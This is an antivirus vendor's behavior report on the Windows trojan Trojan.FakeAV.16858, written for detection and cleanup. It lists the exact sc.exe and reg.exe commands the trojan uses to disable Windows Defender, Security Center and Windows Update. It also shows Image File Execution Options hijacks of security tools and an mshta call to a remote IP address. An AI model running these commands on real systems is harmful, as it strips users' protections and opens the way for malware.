Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.FakeAV.16858

Добавлен в вирусную базу Dr.Web: 2014-02-11

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpuxsrv.exe] 'Debugger' = '%WINDIR%\vsjitdebugger.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpcmdrun] 'Debugger' = '%WINDIR%\vsjitdebugger.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\k9filter.exe] 'Debugger' = 'SvcHost.EXE'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe] 'Debugger' = '"%WINDIR%\Notepad2.exe" /z'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe] 'Debugger' = '"%WINDIR%\Notepad2.exe" /z'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpsvc.dll] 'Debugger' = '%WINDIR%\vsjitdebugger.exe'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'PrSft' = '%APPDATA%\svc-vosi.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSseces] 'Debugger' = '%WINDIR%\vsjitdebugger.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui] 'Debugger' = '%WINDIR%\vsjitdebugger.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSconfig.exe] 'Debugger' = '%WINDIR%\vsjitdebugger.exe'
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\bckd] 'ImagePath' = '22.sys'
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует:
  • Средство контроля пользовательских учетных записей (UAC)
Создает и запускает на исполнение:
  • '%APPDATA%\svc-vosi.exe'
Запускает на исполнение:
  • '<SYSTEM32>\sc.exe' config windefend start= disabled
  • '<SYSTEM32>\sc.exe' config luafv start= disabled
  • '<SYSTEM32>\sc.exe' config wscsvc start = disabled
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe" /v "Debugger" /t REG_SZ /d "\"%WINDIR%\Notepad2.exe\" /z" /f
  • '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe" /v "Debugger" /t REG_SZ /d "\"%WINDIR%\Notepad2.exe\" /z" /f
  • '<SYSTEM32>\sc.exe' config msmpsvc start= disabled
  • '<SYSTEM32>\sc.exe' config bckwfs start = disabled
  • '<SYSTEM32>\sc.exe' stop bckwfs
  • '<SYSTEM32>\mshta.exe' "http://20#.#34.215.209/?0=#############################################"
  • '<SYSTEM32>\sc.exe' stop wscsvc
  • '<SYSTEM32>\sc.exe' config wuauserv start = disabled
  • '<SYSTEM32>\sc.exe' stop wuauserv
Завершает или пытается завершить
следующие системные процессы:
  • <SYSTEM32>\cmd.exe
большое количество пользовательских процессов.
Изменяет следующие настройки браузера Windows Internet Explorer:
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Associations] 'LowRiskFileTypes' = '.zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;'
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments] 'SaveZoneInformation' = '00000001'
Пытается завершить работу операционной системы Windows.
Изменения в файловой системе:
Создает следующие файлы:
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\checkip.dyndns[1]
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\205.234.215[1]
  • %APPDATA%\svc-vosi.exe
Удаляет следующие файлы:
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\checkip.dyndns[1]
Самоудаляется.
Сетевая активность:
Подключается к:
  • 'ch####p.dyndns.org':80
  • '20#.#34.215.209':80
  • 'localhost':1037
TCP:
Запросы HTTP GET:
  • ch####p.dyndns.org/
  • 20#.#34.215.209/?0=#############################################
UDP:
  • DNS ASK ch####p.dyndns.org
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'
  • ClassName: 'Indicator' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке